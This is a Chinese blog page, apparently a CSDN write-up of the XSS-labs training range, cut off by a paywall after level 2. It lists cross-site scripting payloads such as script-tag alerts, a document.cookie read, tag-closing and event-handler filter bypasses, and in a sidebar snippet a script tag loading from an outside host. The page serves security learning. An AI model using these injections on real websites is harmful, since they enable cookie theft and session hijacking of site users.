XSS-labs 做题 1~13

最新推荐文章于 2025-11-26 16:15:49 发布
原创 最新推荐文章于 2025-11-26 16:15:49 发布 · 491 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss

本文详细记录了XSS-labs的1到13级的挑战,涉及JavaScript弹窗函数alert(), confirm(), prompt()的使用,以及在不同过滤机制下如何构造XSS注入语句,包括闭合标签、字符编码、属性注入等方法,展示了XSS攻击的各种绕过策略。

XSS-labs 做题 1~13

先了解一下 JavaScript 的几种常用弹窗函数

alert()

是最常用的方法,引发的弹窗只有一个确定按钮,弹窗内容可以是变量也可以是字符串。
alert() 无返回值。

confirm()

对比 alert 函数,比“确定”多了一个“取消”的按钮。有一个返回值,点击确定返回 true ,取消返回 false 。

prompt()

与 confirm 相比,多了一个输入框。
有返回值,按确定,返回值是语句的变量或字符串内容,按取消返回值是 null 。

XSS注入一般语句

<script>alert("xss")</script>       // 弹出引号内的字符
<script>alert(document.cookie)</script>           // 获取 cookie

XSS-labs

在这里插入图片描述

——

level1

在这里插入图片描述
页面除了一张图片,还显示了 payload 的长度。
可以看到 payload 是从 url 中输入,是 get 请求。
直接尝试经典语句:

?name=<script>alert("xss")</script>

成功执行语句
在这里插入图片描述
——
——

level2

有一个输入框,输入框中的内容会在 url 的参数的值中,同样是 get 请求。
先尝试经典语句,但是无法执行。
在这里插入图片描述
F12 查看源代码,可以看到语句放在了 input 标签中,成为了 value 的值,并且在引号内。
在这里插入图片描述

那就在语句前先把标签和引号闭合。
构造语句:

"><script>alert("xss")<
最低0.47元/天 解锁文章
xss-labs-master通关教程
qq_73792226的博客
09-07 1186
abc
xss-labsxss-labs 靶场通关(1-9)
m0_71944965的博客
08-31 1547
查看网站源码,可以发现get传参name的值test插入了html里头 直接在url后加上JS语句即可 第二关 lever2 查看网页源码发现和第一关差不多,先在url后加上JS语句试试 发现报错 再次查看源码,发现JS语句被包在中没有执行 应该闭合 第三关 level3 先输入123456,然后查看网站源码 所以还是闭合问题,输入第二题的JS语言试试 发现报错 用单引号闭合试试,还是报错,检查源代码 发现符号被过滤 我们可以利用onclick绕过号的过滤来达到执行js的目的在文本框输
XSS学习大全
05-02
XSS学习大全,攻防入门,轻松上手,简单易学,推荐下载
xss-labs-master 1-13 (附解题过程及思路)
weixin_47306547的博客
09-25 1666
XSS测试代码 <script script '" OOnn> 可测试过滤的内容,如大小写,特殊符号,特殊标n签等 第 1 关 过关代码:name=<script>alert(/xss/)</script> 第 2 关 过关代码:keyword= "><script>alert(/xss/)</script> 第 3 关 过关代码:keyword=' onmouseover='alert(...
JavaScript中alert提示窗口的原理与实战应用
最新发布
weixin_32324637的博客
11-26 394
alert()
表单隐藏域
04-22 110
基本语法: &lt;input type="hidden" name="field_name" value="value"&gt; 作用:1 隐藏域在页面中对于用户是不可见的,在表单中插入隐藏域的目的在于收集或发送信息,以利于被处理表单的程序所使用。浏览者单击发送按钮发送表单的时候,隐藏域的信息也被一起发送到服务器。 2 有些时候我们要给用户一信息,让他在提交表单时提交上来以确定用户身...
19道XSS题目】不服来战!
weixin_30907935的博客
05-14 257
记得第一次接触xss这个概念是在高中,那个时候和一个好基友通过黑客X档案和黑客手册。第一次接触到了除了游戏以外的电脑知识,然后知道了,原来电脑除了玩游戏还可以搞这些,从此两人一发不可收拾的爱上了玩黑这方面的东西。 现在想起来,高中时期是在08年左右,那个时候的网络安全环境还蛮差。那个时候没什么计算机知识,跟着杂志直接用工具跑都拿到了蛮多的webshell,后来学的多了,自己会写一些壳过免杀,艳照...
2025年常见渗透测试面试题-XSS题目+回答)
soc的博客
04-08 1441
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。如果给你一个XSS盲打漏洞,但是返回来的信息显示,他的后台是在内网,并且只能使用内网访问,那么你怎么利用这个XSS?如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?如果给你一个XSS漏洞,你还需要哪些条件可以构造一个蠕虫?在社交类的网站中,哪些地方可能会出现蠕虫?如果叫你来防御蠕虫,你有哪些方法?XSS是什么,修复方式是?黑盒如何检测XSS漏洞?
XSS-labs详解
ytdd66的博客
03-23 3922
进入靶场点击图片,开始我们的XSS之旅!
xss-labs通关记 level1~8
qq_35258210的博客
01-08 975
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 level1 level2 level3 level4 level5 level6 level7 level8 level1 1、寻找插
XSS基础题
剁椒咸鱼
10-08 349
XSS基础用法: (脚本关14: 当 这道题,先看下面有guest的文本框,当点击提交查询时会更新下面框的内容 所以可以从下面的文本框下手攻击。先查看这个文本框源代码 看到时在input的value中,于是闭合input,输入 alert'onmouseover=alert(HackingLab)>,再看下源码: 成功闭合!鼠标移到input框时,alert HackingLab. ...
XSSlabs通关手册
04-25
XSSlabs通关手册详解
xss-labs1~13
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 3316
文章目录伪重点第1关第2关第3关第4关第5关第6关第7关第8关第9关第10关第11关第12关第13关 伪重点 <script>alert(1);</script> //直接嵌入script <script src=https://xsspt.com/MQzN0Z></script> //从远程嵌入script <input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入scr
xss-labs漏洞学习
qq_45590470的博客
09-22 488
xss-labs
WEB进阶 XSS题目1-6)
qq_41819426的博客
03-28 1164
第一关 (无过滤绕过) 第一关中,我们看到一个正常页面,通过对URL的解读我们可以发现我们传递的值为username 我们直接使用script标签尝试。 http://5166c8e9-70dc-4685-9af5-66d6dc3c5fef.node4.buuoj.cn:81/level1?username=<script>alert(1)</script> 很简单的就注入成功了。 第二关(符号过滤) 第二关传递值并没有变化,我们继续尝试使用第一关的语句,发现压根就没有回显。 .
细说XSS
LainWith的博客
08-24 2341
什么是XSS 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 通常情况下,我们既可以把跨站脚本理解成一种Web安全漏洞,也可以理解成一种攻击手段。 XSS跨站脚本攻击本身
安全入门级面试题
2401_85421622的博客
05-31 737
综上所述,对于这些漏洞的防范措施,除了上述的版本升级和密钥自定义之外,还应该避免在不安全的网络环境中使用Shiro的rememberMe功能,以及定期对应用程序进行安全审计和代码审查,确保所有的组件都是最新的,并且没有安全漏洞。·漏洞原理:Shiro-721是Padding Oracle Attack,它利用了Shiro的某些版本中PaddingInfo类的实现细节,通过构造特定的序列化数据,攻击者可以利用这个漏洞进行攻击,导致信息泄露或服务器端请求伪造(SSRF)等安全威胁。
XSS漏洞的简介和利用
m0_46397814的博客
08-08 1401
跨站脚本攻击
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 4435
xss的绕过
XSS-labs通关详解:从基础到高级绕过技术
该指南不仅提供了完整的payload示例,还深入剖析了解题思路,对于理解XSS的本质及其对抗技术具有极高的实践价值。 第一关作为入门起点,采用的是最基础的反射型XSS场景:用户输入被直接回显在页面上而未做任何过滤...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值